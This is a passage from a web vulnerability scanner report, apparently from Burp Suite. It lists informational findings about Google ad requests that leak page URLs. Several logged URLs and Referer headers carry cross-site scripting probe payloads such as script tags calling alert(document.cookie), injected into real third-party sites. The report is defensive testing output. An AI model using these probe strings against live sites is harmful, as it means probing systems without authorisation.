AIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyelRf4LQ9USrEmDGNHVYUhgQE-dg%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1H2zeDM-TcPkLcyNmgeH95jcBpuxle4Bm_DL0xmLh8qyUZC4MRABGAEgoYyRAjgAUPe51-P-_____wFgyYajh9SjgBCgAcn29-4DsgEOd3d3LmJlaXJ1dC5jb226AQk3Mjh4OTBfYXPIAQTaAXBodHRwOi8vd3d3LmJlaXJ1dC5jb20vY3NzL2JsdWUvNDQyOWUlMjUyNyUyNTNiYWxlcnQlMjUyOGRvY3VtZW50LmNvb2tpZSUyNTI5JTI1MmYlMjUyZjU5ZjhjNzE4NWM1L3NlYXJjaC1idG4uZ2lm-AEBgAIBuAIYwAIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyelRf4LQ9USrEmDGNHVYUhgQE-dg%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.49. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3DIpswitchFT.com/Secure-File-Transfer%26adT%3DSecure%2BFTP%2BServer%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3DLinux.ittoolbox.com%26adT%3DBoot%2BMirrors%26gl%3DUS&usg=AFQjCNG2SzwXvL44L2E5tM87fwuOrWjAZg

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:51 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3DIpswitchFT.com/Secure-File-Transfer%26adT%3DSecure%2BFTP%2BServer%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3DLinux.ittoolbox.com%26adT%3DBoot%2BMirrors%26gl%3DUS&amp;usg=AFQjCNG2SzwXvL44L2E5tM87fwuOrWjAZg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.50. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924683&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903083872&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903083899&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1035376581&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=1076&xpc=wUl4gWBxBH&p=http%3A//www.masjo.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DOnline%2B%2526amp%253B%2BCampus%2BPrograms%26adU%3Dwww.CustomTyping.com%26adT%3DPractice%2BTyping%2BLessons%26adU%3Dwww.Groupon.com/Washington-DC%26adT%3DWashington%2BDC%2BCoupons%26gl%3DUS&usg=AFQjCNFsc7Pv2bBle50SghEXhjfQziXIIg

Request

GET /pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924683&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903083872&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903083899&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1035376581&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=1076&xpc=wUl4gWBxBH&p=http%3A//www.masjo.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:04:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 15002

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#3088ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DOnline%2B%2526amp%253B%2BCampus%2BPrograms%26adU%3Dwww.CustomTyping.com%26adT%3DPractice%2BTyping%2BLessons%26adU%3Dwww.Groupon.com/Washington-DC%26adT%3DWashington%2BDC%2BCoupons%26gl%3DUS&amp;usg=AFQjCNFsc7Pv2bBle50SghEXhjfQziXIIg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.51. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917071353&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917071355&frm=0&adk=1607234649&ga_vid=1939593495.1295917071&ga_sid=1295917071&ga_hid=850741405&ga_fc=0&u_tz=-360&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143103&fu=0&ifi=1&dtd=5&xpc=Wgz9jL9BqY&p=http%3A//cdn.cloudscan.us
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DEventsManager.GFI.Com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF5ixiUSpJykWD3ZaQXppT4xjGl7A

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917071353&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917071355&frm=0&adk=1607234649&ga_vid=1939593495.1295917071&ga_sid=1295917071&ga_hid=850741405&ga_fc=0&u_tz=-360&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143103&fu=0&ifi=1&dtd=5&xpc=Wgz9jL9BqY&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:02:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4175

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DEventsManager.GFI.Com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF5ixiUSpJykWD3ZaQXppT4xjGl7A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.52. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070447&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885070450&frm=0&adk=3874739809&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=1&dtd=6&xpc=hahEPtcWb5&p=http%3A//www25.big.jp
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGmjpkoAOkmlcVrh6X3j9cRryeHrw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070447&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885070450&frm=0&adk=3874739809&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=1&dtd=6&xpc=hahEPtcWb5&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:24 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7646

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#ffffff"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGmjpkoAOkmlcVrh6X3j9cRryeHrw">Ads by Google</a>
...[SNIP]...

20.53. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916269&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=11&xpc=R7J9Q2zfmY&p=http%3A//www.x64bitdownload.com
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.Centrify.com/Express%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFMtKFw4ua7YenW7qINtzEn3r4Mwg

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916269&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=11&xpc=R7J9Q2zfmY&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 14:54:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3919

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.Centrify.com/Express%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFMtKFw4ua7YenW7qINtzEn3r4Mwg">Ads by Google</a>
...[SNIP]...

20.54. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021527&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885021553&frm=0&adk=3874739809&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=280&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3DTVneto.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHktkcN_kAgpKjC7M0HmIZ5_427VA

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021527&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885021553&frm=0&adk=3874739809&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=280&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:57 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7423

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
